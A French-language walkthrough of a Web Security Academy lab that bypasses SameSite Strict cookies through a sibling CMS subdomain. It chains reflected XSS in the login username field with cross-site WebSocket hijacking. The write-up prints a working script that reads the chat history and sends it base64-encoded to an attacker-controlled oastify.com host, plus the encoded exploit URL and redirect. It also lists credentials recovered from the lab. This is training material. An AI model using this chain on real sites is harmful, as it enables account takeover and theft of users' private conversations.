Bypass SameSite Strict via domaine frère (sibling domain)

SameSite Strict bypass via sibling domain

Lab: SameSite Strict bypass via sibling domain | Web Security AcademyWebSecAcademy

Laboratoire : la fonctionnalité de chat en direct est vulnérable à du « cross-site WebSocket hijacking » (CSWSH). L'objectif du labo est d'accéder au compte de la victime en exfiltrant l'historique du chat vers le serveur Burp Collaborator par défaut ; l'historique contient les identifiants en clair.

Utiliser le serveur d'exploit fourni pour lancer une attaque CSWSH qui exfiltre l'historique du chat de la victime.

Le chat fonctionne via WebSocket et l'historique y transite.

Le cookie de session est envoyé avec SameSite (bloquant les scénarios classiques de redirection cross-site).

Le fichier JavaScript côté client (ex. chat.js) est chargé depuis un sous-domaine CMS qui renvoie un en-tête Access-Control-Allow-Origin permettant une interaction depuis ce sous-domaine.

Le panneau d’authentification du CMS est vulnérable à une injection de script via le paramètre username (ex. ?username=<script>alert(0)</script>&password=test).

<script>alert(0)</script>

/login?username=<script>alert(0)</script>&password=test

En exploitant cette injection, on peut exécuter du JavaScript dans le contexte du sous-domaine vulnérable, et ainsi établir un WebSocket authentifié (les cookies sont alors envoyés, puisque l’origine est la même) vers le serveur de chat.

Approche (résumé)

Placer un script malveillant dans le paramètre username du formulaire de login du sous-domaine CMS.
Ce script ouvre une connexion WebSocket vers le serveur de chat et envoie un signal READY.

<script>
  var ws = new WebSocket("https://0a5900a203763a50c2810c7a0074009d.web-security-academy.net/chat");

  ws.onopen = function() {
    ws.send("READY");
  };

  ws.onmessage = function(info) {
    fetch("https://68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com/?data=" + btoa(info.data));
  };
</script>

À la réception de messages depuis le WebSocket (l’historique du chat), le script fetche ces données (encodées en base64) vers un serveur contrôlé par l’attaquant (OAST/Oastify).

/?data=eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9

Héberger/servir un redirect sur l’exploit server pour pousser la victime à visiter l’URL vulnérable (login avec username contenant le script).

echo "eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9" | base64 -d

Résultats observés

Lorsqu’on a reçu la requête exfiltrée, le paramètre data contenait une chaîne base64 ; en la décodant on obtient l’entrée du chat.
Exemple de payload reçu (base64 décodé) :

{"user":"CONNECTED","content":"-- Now chatting with Hal Pline --"}

En injectant depuis le contexte authentifié (sous-domaine CMS), le script a transmis des messages contenant les conversations de l’utilisateur et, dans ce cas, un message contenant les identifiants en clair.

https://cms-0a5900a203763a50c2810c7a0074009d.web-security-academy.net/login?username=%3Cscript%3E+++var+ws+%3D+new+WebSocket%28%22https%3A%2F%2F0a5900a203763a50c2810c7a0074009d.web-security-academy.net%2Fchat%22%29%3B++++ws.onopen+%3D+function%28%29+%7B+++++ws.send%28%22READY%22%29%3B+++%7D%3B++++ws.onmessage+%3D+function%28info%29+%7B+++++fetch%28%22https%3A%2F%2F68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com%2F%3Fdata%3D%22+%2B+btoa%28info.data%29%29%3B+++%7D%3B+%3C%2Fscript%3E&password=ef

<script>
  location="https://cms-0a5900a203763a50c2810c7a0074009d.web-security-academy.net/login?username=%3Cscript%3E+++var+ws+%3D+new+WebSocket%28%22https%3A%2F%2F0a5900a203763a50c2810c7a0074009d.web-security-academy.net%2Fchat%22%29%3B++++ws.onopen+%3D+function%28%29+%7B+++++ws.send%28%22READY%22%29%3B+++%7D%3B++++ws.onmessage+%3D+function%28info%29+%7B+++++fetch%28%22https%3A%2F%2F68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com%2F%3Fdata%3D%22+%2B+btoa%28info.data%29%29%3B+++%7D%3B+%3C%2Fscript%3E&password=ef";
</script>

Identifiants extraits (tel que noté)

carlos:hdf3fkk8h7tnltupqs5t (identifiants retrouvés dans l’historique du chat)

{"user":"Hal Pline","content":"No problem carlos, it's hdf3fkk8h7tnltupqs5t"}

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?